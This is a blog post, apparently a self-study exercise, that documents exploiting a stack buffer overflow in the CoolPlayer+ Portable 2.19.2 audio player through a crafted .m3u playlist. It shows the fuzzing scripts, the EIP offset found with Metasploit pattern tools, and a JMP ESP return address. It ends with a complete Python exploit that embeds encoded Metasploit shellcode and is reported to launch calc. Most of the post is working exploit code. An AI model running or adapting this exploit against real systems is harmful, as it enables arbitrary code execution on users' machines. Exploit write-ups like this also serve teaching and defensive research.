Comments

Pages

Monday 8 October 2012

Buffer Overflow CoolPlayer+ Portable 2.19.2

Posted by at 12:54 Read our previous post
Today I learn buffer overflow CoolPlayer+ Portable 2.19.2. This is a Audio Player for windows. I need to prepare some tools for exploitation.

  1. Windows XP SP 3 English
  2. Ollydbg
  3. Metasploit
  4. Geany text editor
First, I will create fuzzer. Step by step the fuzzer from 100 until 1000. When fuzzer size 100 byte, the application crash but, the stack space for payload is to small. So I trying to place 1000 fuzzer, and the result is the application crash too and the stack space is enough.


#!C:\Python27\python.exe

########################################
## Information Security Shinobi Camp              #
##    http://is2c-dojo.com                       #
##    http://scx020c07c.blogspot.com                    #
########################################

# How to use
# fuzzer.py playme.m3u "\x41" 1000

import sys
filename = sys.argv[1]
my_args  = sys.argv[2]
long_args= int(sys.argv[3])

sploit = my_args * long_args

fopen = open(filename,'w')
fopen.write(sploit)
Run the fuzzer, open the playlist using Cool Player and look at the EIP. The EIP was overwriten.
After making EIP overwrite, I need to know where the EIP overwriten exactly.
Use metasploit pattern_create to check it,
./pattern_create.rb 1000


edit the fuzzer


#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp              #
##    http://is2c-dojo.com                       #
##    http://scx020c07c.blogspot.com                    #
########################################
filename = "playme.m3u"
junk = ".....pattern_create......"
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)


Now, re-run the fuzzer. Reopen the ollydbg and attach the Coolplayer. Load the playme.m3u again.
Look at the EIP, copy the value and check using pattern_offset of metasploit tools
./pattern_offset.rb 30684139
and return value 209. Now back into fuzzer and edit look like this :



#!C:\Python27\python.exe
########################################
## Information Security Shinobi Camp              #
##    http://is2c-dojo.com                       #
##    http://scx020c07c.blogspot.com                    #
########################################
filename = "playme.m3u"
junk = "\x90" * 209
junk += "\xEF\xBE\xAD\xDE"
junk += "\x41" * (1000-len(junk))
sploit = junk
fopen = open(filename,'w')
fopen.write(sploit)

Run the fuzzer, restart Olly and Coolplayer. Then load playme.m3u again. Make sure that the EIP was overwritten with DEADBEEF.
Then we need module that having opcode JMP ESP.
Click View->Executable Module, double click SHELL32.dll. Search the JMP ESP, Click right->Search For->Command, insert JMP ESP. Please note the address of JMP ESP.

Back into CPU right block, Click in the ESP and Right click Follow in Dump.
We can see that the space for payload is enough for Execute Command Payload. So I will use it.
Generate payload using metasploit and the bad characters is 00,0a,0d
Edit the fuzzer again :

#!C:\Python27\python.exe
junk = "\x90" * 209
junk += "\xD7\x30\x9D\x7C" # JMP ESP
junk += "\x90" * 16
junk += ("\xba\x90\x6e\xa9\x03\xdb\xc1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"
"\x32\x83\xc3\x04\x31\x53\x0e\x03\xc3\x60\x4b\xf6\x1f\x94\x02"
"\xf9\xdf\x65\x75\x73\x3a\x54\xa7\xe7\x4f\xc5\x77\x63\x1d\xe6"
"\xfc\x21\xb5\x7d\x70\xee\xba\x36\x3f\xc8\xf5\xc7\xf1\xd4\x59"
"\x0b\x93\xa8\xa3\x58\x73\x90\x6c\xad\x72\xd5\x90\x5e\x26\x8e"
"\xdf\xcd\xd7\xbb\x9d\xcd\xd6\x6b\xaa\x6e\xa1\x0e\x6c\x1a\x1b"
"\x10\xbc\xb3\x10\x5a\x24\xbf\x7f\x7b\x55\x6c\x9c\x47\x1c\x19"
"\x57\x33\x9f\xcb\xa9\xbc\xae\x33\x65\x83\x1f\xbe\x77\xc3\xa7"
"\x21\x02\x3f\xd4\xdc\x15\x84\xa7\x3a\x93\x19\x0f\xc8\x03\xfa"
"\xae\x1d\xd5\x89\xbc\xea\x91\xd6\xa0\xed\x76\x6d\xdc\x66\x79"
"\xa2\x55\x3c\x5e\x66\x3e\xe6\xff\x3f\x9a\x49\xff\x20\x42\x35"
"\xa5\x2b\x60\x22\xdf\x71\xee\xb5\x6d\x0c\x57\xb5\x6d\x0f\xf7"
"\xde\x5c\x84\x98\x99\x60\x4f\xdd\x56\x2b\xd2\x77\xff\xf2\x86"
"\xca\x62\x05\x7d\x08\x9b\x86\x74\xf0\x58\x96\xfc\xf5\x25\x10"
"\xec\x87\x36\xf5\x12\x34\x36\xdc\x70\xdb\xa4\xbc\x76")

sploit = junk

fopen = open("playme.m3u",'w')
fopen.write(sploit)
fopen.close()


Rerun the fuzzer, open coolplayer and load the playme.m3u again. Look the Coolplayer was crash and calculator appear.


No comments:

Post a Comment

©2012 SECURITY is powered by Blogger - Template designed by Stramaxon - Best SEO Template